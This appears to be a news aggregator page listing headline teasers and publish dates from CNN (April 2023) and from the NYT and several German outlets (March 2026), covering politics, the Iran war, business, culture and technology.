At some middle and high schools in the United States, 1 in 4 teens report they've abused prescription stimulants for attention deficit hyperactivity disorder during the year prior, a new study found.

Article link

Date of publish: Tue, 25 Apr 2023 17:44:36 GMT

Apple CEO was presented with an original Macintosh. See his reaction

CEO Tim Cook personally welcomed customers to the new Apple store in Mumbai as the tech company opens its first retail stores in India. CNN's Vedika Sud reports.

Article link

Date of publish: Tue, 18 Apr 2023 09:17:25 GMT

Democrats bash Justice Clarence Thomas but their plan to investigate ethics allegations is unclear

Senate Democrats railed against Justice Clarence Thomas on Tuesday amid reports that the Supreme Court conservative failed to disclose luxury travel, gifts and a real estate transaction involving a GOP megadonor, but their plan to investigate the conservative jurist remains unclear.

Article link

Date of publish: Tue, 18 Apr 2023 20:29:46 GMT

Russia is 'going backwards' in equipment and deploying post WWII-era tanks, according to Western officials

• Jailed Wall Street Journal reporter Evan Gershkovich denied detention appeal in Moscow • Putin visits Russian troops at military headquarters in Kherson • Watch moment WSJ journalist appears in Russian court

Article link

Two Russians claiming to be former Wagner commanders admit killing children and civilians in Ukraine

Two Russian men who claim to be former Wagner Group commanders have told a human rights activist that they killed children and civilians during their time in Ukraine.

Article link

Date of publish: Tue, 18 Apr 2023 19:07:52 GMT

'My stomach is hurting from laughing': Hear panelist's reaction to DeSantis' threat to Disney

CNN panelists react to Florida Gov. Ron DeSantis floating the idea of building a competing theme park next to Disney World in Orlando.

Article link

Date of publish: Tue, 18 Apr 2023 03:24:56 GMT

GOP prepared to block vote to replace Feinstein on Senate Judiciary

Senate Majority Leader Chuck Schumer said on Tuesday that he hopes to replace Democratic Sen. Dianne Feinstein on the Senate Judiciary Committee with Sen. Ben Cardin of Maryland and aims to set up a floor vote on the issue this afternoon, which Republicans are expected to block.

Article link

Date of publish: Tue, 18 Apr 2023 22:03:13 GMT

Oklahoma governor calls on officials to resign over recording of racist and threatening remarks

Article link

Date of publish: Tue, 18 Apr 2023 17:33:17 GMT

McCarthy slams Biden in handling of US debt

House Speaker Kevin McCarthy traveled to Wall Street on Monday to deliver a fresh warning that the House GOP majority will refuse to lift a cap on government borrowing unless Biden agrees to spending cuts that would effectively neutralize his domestic agenda.

Article link

Date of publish: Tue, 18 Apr 2023 22:03:01 GMT

US warns Russia not to touch American nuclear technology at Ukrainian nuclear plant

The US has sensitive nuclear technology at a nuclear power plant inside Ukraine and is warning Russia not to touch it, according to a letter the US Department of Energy sent to Russia's state-owned nuclear energy firm Rosatom last month.

Article link

Date of publish: Wed, 19 Apr 2023 08:35:33 GMT

Repeated gunshots fired on live TV as ex-lawmaker shot by assassins

Atiq Ahmed, a former lawmaker in India's parliament, convicted of kidnapping, was shot dead along with his brother while police were escorting them for a medical check-up in a slaying caught on live television on Saturday. CNN's Vedika Sud reports.

Article link

Date of publish: Tue, 18 Apr 2023 09:41:42 GMT

FDA clears the way for additional bivalent boosters for certain vulnerable individuals

The U.S. Food and Drug Administration amended the terms of its emergency use authorizations for the Pfizer and Moderna bivalent vaccines on Tuesday, allowing people ages 65 and older and certain people with weakened immunity to get additional doses before this fall's vaccination campaigns.

Article link

Date of publish: Tue, 18 Apr 2023 15:09:15 GMT

Maine authorities detained a person of interest after 4 people were found dead in a home and 3 others shot while driving

Maine authorities have detained a person of interest and continue to investigate after two shooting incidents that appear to be connected left at least four people dead and three others injured, state police said.

Article link

Date of publish: Wed, 19 Apr 2023 01:49:51 GMT

Southwest says flights resumed after delays caused by 'tech issues'

• Delta Air Lines reports record bookings for summer travel • Air France and Airbus acquitted in trial over 2009 plane crash

Article link

Date of publish: Tue, 18 Apr 2023 17:15:29 GMT

Damar Hamlin cleared to resume football activities after January cardiac arrest

Buffalo Bills safety Damar Hamlin, who has been cleared to resume football activities, said Tuesday his cardiac arrest during an NFL game in January was caused by commotio cordis.

Article link

Date of publish: Tue, 18 Apr 2023 22:11:37 GMT

Pilot makes history after landing on top of a 56-story hotel

Polish pilot Lukasz Czepiela made history after landing a plane on a helipad at the top of a 56-story hotel in Dubai.

Article link

Date of publish: Sun, 19 Mar 2023 11:22:30 GMT

Top US Navy admiral defends non-binary sailor amid some Republican criticism

The top US Navy admiral ardently defended a non-binary sailor on Tuesday amid some criticism from Republican lawmakers, saying he is "particularly proud of this sailor."

Article link

Date of publish: Tue, 18 Apr 2023 19:56:40 GMT

Fulton County DA says fake Trump electors are incriminating one another and wants lawyer disqualified

The Fulton County District Attorney's office said some fake electors for Donald Trump have implicated each other in potential criminal activity and is seeking to disqualify their lawyer, according to a new court filing.

Article link

Date of publish: Wed, 19 Apr 2023 15:31:24 GMT

High speed trains are racing across the world. But not in America

High speed trains have proved their worth across the world over the past 50 years.

Article link

Date of publish: Wed, 19 Apr 2023 02:39:40 GMT

Podcast: One country musician is calling for other artists to oppose assault rifles
Here's what you need to know if you haven't filed your return yet — and even if you have

It's April 18, the official deadline to file your federal and state income tax returns for 2022. (It is also, apparently, National Animal Crackers Day for those who celebrate.)

Article link

Date of publish: Tue, 18 Apr 2023 14:15:43 GMT

Undocumented immigrants are paying their taxes today, too

It's a surprising fact that's often overlooked in the immigration debate.

Article link

Date of publish: Tue, 18 Apr 2023 18:29:24 GMT

Opinion: Why millionaires like us want to pay more in taxes

Tuesday is Tax Day in America, one of the most stressful days of the year, when many taxpayers will finally end their procrastination, file their federal returns, and hope for a refund from the IRS. But for many of the nation's wealthiest, it's just another Tuesday.

Article link

Date of publish: Mon, 17 Apr 2023 19:32:49 GMT

'World's longest' purpose-built cycling tunnel opens in Norway

There are many ways to explore the seven mountains that surround the picturesque UNESCO World Heritage city of Bergen on Norway's fjord-studded west coast. The newest, however, might well be record-breaking.

Article link

Date of publish: Tue, 18 Apr 2023 10:44:27 GMT

Artist rejects photo prize after AI-generated image wins award

A German artist has rejected an award from a prestigious international photography competition after revealing that his submission was generated by Artificial Intelligence (AI).

Article link

Date of publish: Tue, 18 Apr 2023 15:27:54 GMT

These ships disappeared in Lake Superior a century ago. Watch as they're found again

The Great Lakes Shipwreck Historical Society has found two of three ships that sank in the same Lake Superior storm more than a century ago, locating one in 2021 and the other in 2022.

Article link

Date of publish: Tue, 18 Apr 2023 19:29:01 GMT

Erotic images of seniors show sex and intimacy in new light

What does intimacy look like for seniors? There's no end to sex scenes and other steamy content featuring the young and unwrinkled, but past a certain age, popular culture largely draws a blank — or treats sex as a punchline.

Article link

Date of publish: Tue, 18 Apr 2023 03:24:57 GMT

China's economy is off to a solid start, rising 4.5% in Q1 2023

China's economy is off to a solid start in 2023 following its emergence from three years of strict pandemic restrictions.

Article link

Date of publish: Tue, 18 Apr 2023 07:01:12 GMT

Even when wives make as much as husbands, they still do more at home

• Four out of the five US metro areas with the lowest unemployment are in Florida. Here's why • Opinion: The overlooked problem with raising the retirement age for Social Security

Article link

Date of publish: Sun, 16 Apr 2023 17:29:49 GMT

McDonald's is upgrading its burgers

McDonald's, which has been focusing on upgrading its core items to boost sales, is rolling out a series of changes designed to improve its signature burgers.

Article link

Date of publish: Mon, 17 Apr 2023 16:31:30 GMT

Google-parent stock drops on fears it could lose search market share to AI-powered rivals

Shares of Google-parent Alphabet fell more than 3% in early trading Monday after a report sparked concerns that its core search engine could lose market share to AI-powered rivals, including Microsoft's Bing.

Article link

Date of publish: Mon, 17 Apr 2023 15:52:19 GMT

Bidets save you money and reduce waste — we tested the best options out there
50+ products to make your life easier and our planet cleaner
Mother's Day is around the corner. Here are 50+ thoughtful gifts she'll love
A head-to-toe guide of how men should dress this spring, and where they should shop
42 of the most useful travel products you can buy on Amazon
The 7 best high-yield savings accounts of April 2023
Taxes are due tomorrow. Here's how to file for an extension
Composting is an easy way to reduce food waste. Here's how to do it
We stopped using aluminum foil for cooking and you should too. Here's what to use instead
The beloved Dyson Supersonic hair dryer is at its lowest price ever
Everything you need to know about Way Day 2023, Wayfair's biggest sale of the year
The 10 best Amazon deals to shop this week
Mifepristone saved my life

The ruling earlier this month by a Texas federal judge to suspend the US Food and Drug Administration's approval of a drug that is used frequently for medication abortions, is very personal for me.

Article link

Date of publish: Tue, 18 Apr 2023 11:30:00 GMT

The 2024 presidential alternative many voters will want
Why isn't the House Judiciary Committee looking into Thomas?

On Monday, the GOP-controlled House Judiciary Committee — chaired by Donald Trump ally Rep. Jim Jordan — is set to hold a field hearing in New York City called "Victims of Violent Crime in Manhattan." A statement bills the hearing as an examination of how, the Judiciary Committee says, Manhattan District Attorney Alvin Bragg's policies have "led to an increase in violent crime and a dangerous community for New York City residents."

Article link

Date of publish: Mon, 17 Apr 2023 11:37:37 GMT

Top secrets come spilling out

In 1917, British analysts deciphered a coded message the German foreign minister sent to one of his country's diplomats vowing to begin "unrestricted submarine warfare" and seeking to win over Mexico with a promise to "reconquer the lost territory in Texas, New Mexico and Arizona" if the US entered the world war. When it became public, the Zimmerman Telegram caused a sensation, helping propel the US into the conflict against Germany.

Article link

Date of publish: Sun, 16 Apr 2023 11:22:36 GMT

How did Sudan go from casting off despotic rule to this?

Four years ago, almost to the day, the people of Sudan were celebrating a revolution after overthrowing longtime dictator Omar al-Bashir. Now the East African country faces the possibility of a complete collapse similar to the chaos we see today in Yemen or Libya.

Article link

Date of publish: Mon, 17 Apr 2023 22:45:23 GMT

Michelle Yeoh set to return in new 'Star Trek' movie

Live long and prosper, Michelle Yeoh.

Article link

Date of publish: Tue, 18 Apr 2023 19:11:23 GMT

Recap: 'Succession' finds dark humor in the aftershocks

After the shock came the aftershocks, the power vacuum, and perhaps most significantly and impressively, the laughs, as "Succession" pivoted to face life after Logan Roy, in an episode that finally put the HBO show's title into full flower.

Article link

Date of publish: Mon, 17 Apr 2023 02:28:12 GMT

'Yellowjackets' leans hard into '90s music nostalgia, and we're here for it

Of the many dark gifts Showtime's eerie hit series "Yellowjackets" serves up for us, the juiciest this season is by far the music.

Article link

Date of publish: Mon, 01 May 2023 23:02:04 GMT

Jeremy Renner revisits 'the amazing group of people' who helped him recover from his accident

Jeremy Renner is continuing his recovery after his devastating snowplow accident in January, and recognizing those who've helped him along the way.

Article link

Date of publish: Sun, 16 Apr 2023 19:04:10 GMT

Review: 'Barry' takes a whack at its farewell season

"Barry" has taken chances from the very beginning, which is certainly true of a fourth and final season that picks up where the third left off, with its hitman-turned-wannabe actor getting arrested. That paves the way for an even darker season that accentuates the show's ensemble aspect while leaning a little too heavily on blurring lines with flights of fancy.

Article link

Date of publish: Fri, 14 Apr 2023 12:33:08 GMT

NYT > Top Stories

Trump’s War in Iran, and Rising Gas Prices, Collide With Midterm Agenda

The attack on Iran has led to a surge in energy prices at a moment when the cost of living is a major issue heading into the fall elections.

Article link

Date of publish: Tue, 10 Mar 2026 03:32:18 +0000

New Supreme Leader Inherits Sprawling, Secretive Office That Dominates Iran

His father, Ayatollah Ali Khamenei, had turned what was traditionally a religious affairs office into a shadowy national security juggernaut.

Article link

Date of publish: Tue, 10 Mar 2026 09:03:19 +0000

War Brings New Water Crises to an Already-Parched Iran

Iran has accused the United States of bombing a desalination plant on Qeshm Island. The country was already facing a severe water shortage.

Article link

Date of publish: Tue, 10 Mar 2026 09:03:24 +0000

Trump Zigzags on When War Will End, and Investigators Search Epstein’s Ranch in New Mexico

Plus, space mirrors?

Article link

Date of publish: Tue, 10 Mar 2026 10:00:09 +0000

U.S. Solar Installations Fell in 2025 as Trump Attacked Clean Energy

More solar energy was added to U.S. grids than any other technology, but the amount installed fell by 14 percent, according to a new report.

Article link

Date of publish: Tue, 10 Mar 2026 04:01:04 +0000

Two Supreme Court Justices Debate Handling of Trump Emergency Cases

In a rare joint appearance, Justices Ketanji Brown Jackson and Brett M. Kavanaugh offered sharply different views on how the court should handle emergency requests.

Article link

Date of publish: Tue, 10 Mar 2026 02:44:15 +0000

Trump Antisemitism Inquiry Demanding List of Jews at Penn Heads to Court

The Trump administration, which said it is investigating harassment, sued the University of Pennsylvania after it refused a request to provide information about Jewish students and staff.

Article link

Date of publish: Tue, 10 Mar 2026 09:01:17 +0000

Alexander Brothers Found Guilty on All Counts in Sex-Trafficking Trial

The verdict comes more than a month after the trial began in Federal District Court in Manhattan where the jury heard weeks of emotional and often graphic testimony.

Article link

Date of publish: Tue, 10 Mar 2026 00:37:57 +0000

Casting, Which Will Be Celebrated at This Year’s Oscars, Has Changed Drastically

What once involved an actor and a casting director in a room is now a technologically advanced exercise with pros and cons for performers.

Article link

Date of publish: Mon, 09 Mar 2026 09:01:02 +0000

How Best Picture is Decided

Best picture is the only Oscar category decided by preferential ballot. Our reporter Marc Tracy explains how that works.

Article link

Date of publish: Tue, 10 Mar 2026 09:00:43 +0000

Here Are the Key Races to Watch in Mississippi and Georgia Elections

It’s primary day in Mississippi, where a younger Democrat is trying to oust a House veteran, and in Georgia, where Marjorie Taylor Greene’s seat is up for grabs.

Article link

Date of publish: Tue, 10 Mar 2026 09:01:56 +0000

iPads in Kindergarten, YouTube on Breaks: The School Screen-Time Battle

Mounting evidence shows that excessive computer use can harm children, so parents are cutting back at home. Now, the debate has shifted to the classroom.

Article link

Date of publish: Tue, 10 Mar 2026 07:00:19 +0000

Mamdani Chooses His Words Carefully After Alleged Terror Attack

Mayor Zohran Mamdani has been spare in his remarks following the attempted bombing at Gracie Mansion and arrests of two men who said they were motivated by ISIS.

Article link

Date of publish: Tue, 10 Mar 2026 01:01:56 +0000

Cancer Haunts Neighbors of Canada’s Oil Sands Wastelands

Though high rates of the disease persist among the nearby Indigenous communities, the Canadian government is weighing rules that may allow energy giants to release treated mining waste into the river system.

Article link

Date of publish: Tue, 10 Mar 2026 07:00:19 +0000

Who Is Balendra Shah, the Rapper Set to Be Nepal’s Next Prime Minister?

Balendra Shah’s party won a landslide in the election that followed Nepal’s Gen Z revolution. His style is pugnacious.

Article link

Date of publish: Tue, 10 Mar 2026 08:52:26 +0000

I Asked a Former Trump Official to Justify This War

Nadia Schadlow, a deputy national security adviser during Trump’s first term, explains how the U.S.-Israel war with Iran fits in with an “America First” agenda.

Article link

Date of publish: Tue, 10 Mar 2026 09:03:52 +0000

Trump Has No Idea How to End the War With Iran

Only when the U.S.-Israeli bombing of Iran comes to a halt, without destroying the state, can the Iranian people sort out their fate.

Article link

Date of publish: Tue, 10 Mar 2026 01:50:53 +0000

War and the Economy

We look at the conflict’s global economic impact.

Article link

Date of publish: Tue, 10 Mar 2026 10:48:28 +0000

Late Night Scolds Trump Over Gasoline Prices

“You can lie about many things in American life, but one thing you can’t lie about is gas prices,” Late Night host Seth Meyers said. “Everyone sees it.”

Article link

Date of publish: Tue, 10 Mar 2026 06:26:05 +0000

Fiscal Crunch Presents a First Big Policy Challenge for Mikie Sherrill

Ms. Sherrill will present her first budget as New Jersey governor in Trenton on Tuesday, and with it a robust preview of her policy priorities.

Article link

Date of publish: Tue, 10 Mar 2026 07:00:10 +0000

Epstein’s Remote Zorro Ranch Is Searched by New Mexico Investigators

Some of the disgraced financier’s victims have said they were trafficked at the property south of Santa Fe, where the nearest neighbors are miles away.

Article link

Date of publish: Mon, 09 Mar 2026 23:39:47 +0000

Bo Gritz, Vietnam Veteran Called a Real-Life Rambo, Dies at 87

He served in the Special Forces, led a postwar raid to find P.O.W.s and became a voice of the right-wing anti-government fringe.

Article link

Date of publish: Mon, 09 Mar 2026 18:24:40 +0000

Meteorite Crashes Through Roof in Germany After Fiery Light Show

The fireball from space was spotted by a network of sky-watching cameras in Belgium, France, Luxembourg, the Netherlands and Germany.

Article link

Date of publish: Mon, 09 Mar 2026 22:22:42 +0000

German News

News sites below.

DER SPIEGEL - Schlagzeilen – Tops

Irankrieg: Benjamin Netanyahu widerspricht Donald Trump zu möglichem Ende

Wird der Irankrieg bald enden? Israels Regierungschef Benjamin Netanyahu hat davon offenbar ganz andere Vorstellungen als US-Präsident Donald Trump.

Article link

Date of publish: Tue, 10 Mar 2026 11:50:00 +0100

Löhne: So viel sind die Gehälter in Ihrer Region wert

Wie viel kann ich mir von einem normalen Lohn leisten? Die Antwort hängt stark davon ab, wo Sie wohnen. Die Deutschlandkarte zeigt, wo Preise und Gehälter besonders attraktiv sind – und wo nicht.

Article link

Date of publish: Tue, 10 Mar 2026 10:12:00 +0100

SPD: Landtagswahl-Ergebnis als Warnung vor regionaler Bedeutungslosigkeit

Das schlechteste Ergebnis der Partei bei einer Landtagswahl ist eine schonungslose Abrechnung der Wähler. Wenn die SPD weiter Ausreden bemüht, droht ihr das Schicksal einer Regionalpartei.

Article link

Date of publish: Tue, 10 Mar 2026 09:25:00 +0100

Nachrichten - WELT

Von der Leyen bezeichnet Abkehr von Atomkraft als „strategischen Fehler“

EU-Kommissionspräsidentin Ursula von der Leyen nennt die Abkehr von der Atomkraft einen strategischen Fehler und kündigt 200 Millionen Euro Risikoabsicherung für Investoren in neue Atomtechnologien an.

Article link

Date of publish: Tue, 10 Mar 2026 11:09:03 GMT

AfD fällt in Umfrage auf schlechtestem Wert seit letztem Sommer – Union kann leicht zulegen

Die AfD hat in Umfragen lange hohe Zustimmungswerte halten können. Doch in der aktuellen Sonntagsfrage des Instituts Insa büßt die Partei diese ein. Davon profitiert haben SPD und Grüne.

Article link

Date of publish: Tue, 10 Mar 2026 11:08:04 GMT

„Trump blickt auf Benzinpreise und fragt sich, ob ihm die möglichen Folgen bewusst waren“

Wie lange werden die USA noch Krieg gegen den Iran führen? Der US-Präsident hat zuletzt verschiedene Zeithorizonte genannt. Im Interview erklärt sein früherer Sicherheitsberater John Bolton, worin das größte Risiko für Washington besteht.

Article link

Date of publish: Tue, 10 Mar 2026 11:07:09 GMT

Nachrichten: DIE ZEIT Newsfeed

Identitäre Bewegung: Rechtsextremist Martin Sellner gewinnt Klage gegen Aufenthaltsverbot

Die Gemeinde Neulingen hatte 2024 eine Lesung des Rechtsextremen Martin Sellner verhindert. Der Österreicher hat erfolgreich gegen das Aufenthaltsverbot geklagt.

Article link

Date of publish: Tue, 10 Mar 2026 10:51:03 -0000

Krieg gegen die Ukraine: Dnipropetrowsk soll fast vollständig unter ukrainischer Kontrolle sein

Das Gebiet Dnipropetrowsk ist nach Gegenangriffen offenbar teilweise wieder unter ukrainischer Kontrolle. Pistorius besorgt weitere Patriot-Raketen. Das Liveblog

Article link

Date of publish: Tue, 10 Mar 2026 10:48:40 -0000

BioNTech: BioNTech-Gründer verlassen Unternehmen und gründen neues

In der Pandemie wurden die Mediziner Uğur Şahin und Özlem Türeci mit ihrem Unternehmen BioNTech weltbekannt. Die Gründer wollen den Konzern bis spätestens 2026 verlassen.

Article link

Date of publish: Tue, 10 Mar 2026 10:44:59 -0000

netzpolitik.org

Zuckerbrot und Peitsche: Digitalminister will Breitband-Regulierung lockern

Viele Breitbandkabel sind derzeit magentafarben, müssen es aber nicht sein. (Symbolbild) – Alle Rechte vorbehalten IMAGO / Joerg Boethling
Jahrelang konnte sich die Netzbetreiber-Branche nicht auf einen freiwilligen Open-Access-Ansatz einigen. Nun will das Digitalministerium den gordischen Knoten durchschlagen: Unter bestimmten Bedingungen sollen Wettbewerber die Marktführerin in ihre Netze lassen. Das könnte unvorhergesehene Nebenwirkungen haben.

Article link

Date of publish: Mon, 09 Mar 2026 17:10:24 +0000

Angriffe auf Journalismus, Politik und Militär: Was auf die russische Urheberschaft der Signal-Phishing-Attacken deutet

Fadenkreuz, das auf das Symbol der Signal-App auf einem handy gerichtet ist
Die Attacken zeichnen sich dadurch aus, dass sie nicht generisch auf eine sehr große Anzahl gerichtet sind, sondern auf Vertreter:innen aus Politik, Militär und Journalismus. – Gemeinfrei-ähnlich freigegeben durch unsplash.com Adem AY / Montage: netzpolitik.org
Niederländische Geheimdienste sagen, dass Russland hinter dem Phishing steckt, bei dem auch in Deutschland prominente Personen betroffen sind. Dafür liefern sie allerdings keine Beweise. Netzpolitik.org hat in den letzten Wochen Indizien für eine russische Urheberschaft gesammelt.

Article link

Date of publish: Mon, 09 Mar 2026 15:48:00 +0000

Verhaltensscanner und Palantir: Was das Wahlergebnis in Baden-Württemberg sicherheitspolitisch bedeutet

Cem Özdemir und Manuel Hagel sitzen nebeneinander.
Cem Özdemir (Grüne) und Manuel Hagel (CDU), sicherheitspolitisch auf einer Linie. – Alle Rechte vorbehalten IMAGO / Chris Emil Janßen
Das baden-württembergische Landtagswahlergebnis gibt der grün-schwarzen Koalition freie Hand für ihre Überwachungspläne. Geht es nach den Spitzenpolitikern, kann bald jedes Dorf videoüberwacht werden, und eine KI schaut, wer sich gut benimmt. Jetzt braucht es nur noch eine lokale Palantir-Alternative.

Article link

Date of publish: Mon, 09 Mar 2026 12:50:29 +0000

Golem.de

Dark Patterns bei KI-Companions: Ist es Liebe?

Oder geht's nur ums Geld? Companions sind die Verführer unter den Chatbots. Sie sind eine Hilfe für manche und eine Gefahr für viele - auch für die Demokratie. Von Michael Strautmann (KI, Computersucht)

Article link

Date of publish: Tue, 10 Mar 2026 12:00:02 +0100

Bis 2030: VW plant Abbau von 50.000 Stellen in Deutschland

Der VW-Konzern hat wegen Porsche und Trump seinen Gewinn halbiert. Allein die Softwaretochter Cariad machte 2,2 Milliarden Euro Verlust. (VW, Elektroauto)

Article link

Date of publish: Tue, 10 Mar 2026 11:49:02 +0100

Anzeige: Begehrtes Tablet von Samsung bei Amazon günstig wie nie

Das Samsung Galaxy Tab A11+ mit scharfem 11''-Display, Dolby Atmos und Gemini gibt es im Frühlingsangebot bei Amazon zum neuen Tiefstpreis. (Galaxy Tab, Samsung)

Article link

Date of publish: Tue, 10 Mar 2026 11:40:02 +0100

DER SPIEGEL - Schlagzeilen – Tops

Irankrieg: Benjamin Netanyahu widerspricht Donald Trump zu möglichem Ende

Wird der Irankrieg bald enden? Israels Regierungschef Benjamin Netanyahu hat davon offenbar ganz andere Vorstellungen als US-Präsident Donald Trump.

Article link

Date of publish: Tue, 10 Mar 2026 11:50:00 +0100

Löhne: So viel sind die Gehälter in Ihrer Region wert

Wie viel kann ich mir von einem normalen Lohn leisten? Die Antwort hängt stark davon ab, wo Sie wohnen. Die Deutschlandkarte zeigt, wo Preise und Gehälter besonders attraktiv sind – und wo nicht.

Article link

Date of publish: Tue, 10 Mar 2026 10:12:00 +0100

SPD: Landtagswahl-Ergebnis als Warnung vor regionaler Bedeutungslosigkeit

Das schlechteste Ergebnis der Partei bei einer Landtagswahl ist eine schonungslose Abrechnung der Wähler. Wenn die SPD weiter Ausreden bemüht, droht ihr das Schicksal einer Regionalpartei.

Article link

Date of publish: Tue, 10 Mar 2026 09:25:00 +0100

Boris Pistorius organisiert Patriot-Raketen für die Ukraine

Wegen des hohen Verbrauchs an Flugabwehrraketen im Nahen Osten sorgt sich Präsident Selenskyj um den Nachschub für die Ukraine. Nach SPIEGEL-Informationen kommt nun zumindest ein kleines Paket, das Boris Pistorius geschnürt hat.

Article link

Date of publish: Tue, 10 Mar 2026 05:57:00 +0100

Nordkorea und China reaktivieren Zugverbindung nach Unterbrechung wegen Covid-19

Zwischen Pjöngjang und Peking könnte bald wieder ein Zug fahren. Nachdem Kim Jong Un die Grenzen seines Landes in der Covid-19-Pandemie geschlossen hatte, soll der Tourismus nun offenbar wieder anrollen.

Article link

Date of publish: Tue, 10 Mar 2026 09:45:00 +0100

Jeffrey Epstein: »Zorro Ranch« in New Mexico wird durchsucht

In den Epstein-Files fällt ihr Name tausendfach, auch mit dem Tod zweier Mädchen wird sie in Verbindung gebracht: Ermittler haben mit der Durchsuchung der »Zorro Ranch« begonnen. Das Anwesen ist gewaltig.

Article link

Date of publish: Tue, 10 Mar 2026 11:18:00 +0100

Wermelskirchen: Freispruch für Angeklagten im Prozess um Brandstiftung

Die Indizien reichen nicht: Ein 34-Jähriger, der wegen versuchten Mordes und schwerer Brandstiftung angeklagt war, ist vom Landgericht Köln freigesprochen worden. Im Verfahren hatte er geschwiegen.

Article link

Date of publish: Tue, 10 Mar 2026 12:00:00 +0100

Sachsen weitet Handyverbot an Schulen bis zur achten Klasse aus

An Grundschulen sind private Handys bereits verboten, ab dem kommenden Schuljahr sind sie bis Klasse 8 tabu: Sachsens Bildungsminister will die Regeln verschärfen und wird im Ländervergleich damit zum Hardliner.

Article link

Date of publish: Tue, 10 Mar 2026 11:55:00 +0100

IU Internationale Hochschule: Die fragwürdigen Silicon‑Valley‑Methoden der Privathochschule

Die IU verspricht ihren 130.000 Studierenden eine Revolution in der Bildung. Doch Mitarbeiter zeichnen ein anderes Bild: Sie berichten von hartem Profitdruck und einem Chef, der agiert wie Elon Musk.

Article link

Date of publish: Sat, 21 Feb 2026 08:31:00 +0100

Seti-Projekt: Sonnenstürme erschweren Suche nach Außerirdischen

Warum haben Astronomen bislang keine Botschaft einer fremden Intelligenz nachgewiesen? Eine Studie zeigt: Es könnte daran liegen, dass sie nach den falschen Signalen schauen.

Article link

Date of publish: Tue, 10 Mar 2026 12:02:00 +0100

Winterspiele 2026: Ukrainischer Biathlet dankt ChatGPT für paralympische Medaille

Para-Biathlet Maksym Muraschkowsky hat im Einzelrennen der sehbehinderten Männer Silber gewonnen. Ein KI-Chatbot verhalf ihm dabei zum Erfolg: als Psychologe, Trainer und sogar als Arzt.

Article link

Date of publish: Tue, 10 Mar 2026 11:11:00 +0100

Joseph Blatter: Ehemaliger Fifa-Präsident wird am Dienstag 90 Jahre alt

Der frühere Fifa-Boss Joseph Blatter feiert heute seinen 90. Geburtstag. Noch immer sieht er keine persönliche Verantwortung für die Korruptionsskandale des Verbandes. Er meint: Sein Nachfolger ist an allem schuld.

Article link

Date of publish: Tue, 10 Mar 2026 08:06:00 +0100

Mehrsprachigkeit und Identität: Akzente als Stärke und Herausforderung

Indisch, Arabisch, Sächsisch: Ein Akzent prägt, wie wir wahrgenommen werden. Fünf Menschen erzählen, welchen Vorurteilen sie begegnen – und wann ihre Sprachfärbung zur Stärke wurde. Inklusive Hörprobe.

Article link

Date of publish: Tue, 10 Mar 2026 09:25:00 +0100

Liebe in der DDR: Gerlinde macht rüber

Der Kalte Krieg trennte Familien und Verliebte. Aber nicht immer führte der Weg zum Glück von Ost nach West. Gerlinde Breithaupt wählte statt der Freiheit die Liebe im Überwachungsstaat.

Article link

Date of publish: Thu, 20 Nov 2025 13:00:00 +0100

Joko Winterscheidt – »Wetten, dass..?«: Joko und Klaas führten Gespräche über Moderation

»Wetten, dass..?« ist der Dinosaurier unter den Samstagabendshows. Im Dezember beleben ihn die Kaulitz-Brüder wieder. Nach Gottschalks Rückzug 2011 hat das ZDF offenbar auch einen andere Besetzung in Betracht gezogen.

Article link

Date of publish: Tue, 10 Mar 2026 11:38:00 +0100

AfD nach der Landtagswahl: Erst lästert Alice Weidel über die Anwesenden. Dann beginnt sie zu essen

Skurrile Schalte: Bei einer Fernsehübertragung zur Wahl in Baden-Württemberg plauderte die AfD-Chefin vor sich hin. Offenbar war ihr nicht klar, dass das Mikrofon angeschaltet war.

Article link

Date of publish: Mon, 9 Mar 2026 16:29:00 +0100

Iran: Warum das Regime trotz Krieg stabil bleibt

Mit der Wahl von Mojtaba Khamenei zum neuen Obersten Führer scheint das iranische Regime trotz Kriegs gefestigt. Wie kann das sein? Die Antwort liegt in seiner besonderen Konstruktion.

Article link

Date of publish: Mon, 9 Mar 2026 20:08:00 +0100

Frühlingsmüdigkeit: Was wirklich hinter dem Schlaf-Mythos steckt

»Frühlingsmüdigkeit« gilt als legitime und weitverbreitete Erklärung, wenn im März die Energie fehlt. In einer Studie wurde nun untersucht, was an dem Phänomen dran ist.

Article link

Date of publish: Mon, 9 Mar 2026 09:22:00 +0100

Shakti-Matten: Akupressurmatten von Calm Elephant, Glanzstück Berlin, Ergotopia im Test

Hersteller von Akupressurmatten versprechen Schmerzlinderung und besseren Schlaf. Doch was bewirken die Nadelmatten wirklich? Wer sollte sie nutzen? Und welches Modell ist besonders gut?

Article link

Date of publish: Sat, 7 Mar 2026 09:59:00 +0100

Ralph Ziman macht Kriegsgerät zu Kunst: »Ich wünschte, es gäbe keine Waffen«

Ralph Ziman verwandelt Gewehre, Panzer und einen Kampfjet in Kunstwerke. Dafür braucht er Millionen Perlen und eine Menge Geduld.

Article link

Date of publish: Tue, 3 Mar 2026 10:52:00 +0100

Nachrichten - WELT

Von der Leyen bezeichnet Abkehr von Atomkraft als „strategischen Fehler“

EU-Kommissionspräsidentin Ursula von der Leyen nennt die Abkehr von der Atomkraft einen strategischen Fehler und kündigt 200 Millionen Euro Risikoabsicherung für Investoren in neue Atomtechnologien an.

Article link

Date of publish: Tue, 10 Mar 2026 11:09:03 GMT

AfD fällt in Umfrage auf schlechtestem Wert seit letztem Sommer – Union kann leicht zulegen

Die AfD hat in Umfragen lange hohe Zustimmungswerte halten können. Doch in der aktuellen Sonntagsfrage des Instituts Insa büßt die Partei diese ein. Davon profitiert haben SPD und Grüne.

Article link

Date of publish: Tue, 10 Mar 2026 11:08:04 GMT

„Trump blickt auf Benzinpreise und fragt sich, ob ihm die möglichen Folgen bewusst waren“

Wie lange werden die USA noch Krieg gegen den Iran führen? Der US-Präsident hat zuletzt verschiedene Zeithorizonte genannt. Im Interview erklärt sein früherer Sicherheitsberater John Bolton, worin das größte Risiko für Washington besteht.

Article link

Date of publish: Tue, 10 Mar 2026 11:07:09 GMT

„Lage ist so dramatisch wie noch nie“

Die deutsche Wirtschaft steht vor massiven Herausforderungen: Arbeitsplatzabbau, hohe Energiekosten und stagnierendes Wachstum. „Die wirtschaftlichen Prognosen sind alle sehr miserabel, vor allem im internationalen Vergleich“, sagt INSM-Geschäftsführer Thorsten Alsleben.

Article link

Date of publish: Tue, 10 Mar 2026 11:01:23 GMT

„In Deutschland haben wir keinerlei Preisregulierung“

Alexander von Gersdorff, Pressesprecher des Wirtschaftsverbands Fuels und Energie, erklärt bei WELT TV die Preisentwicklung an deutschen Tankstellen und betont die Bedeutung internationaler Märkte.

Article link

Date of publish: Tue, 10 Mar 2026 10:52:19 GMT

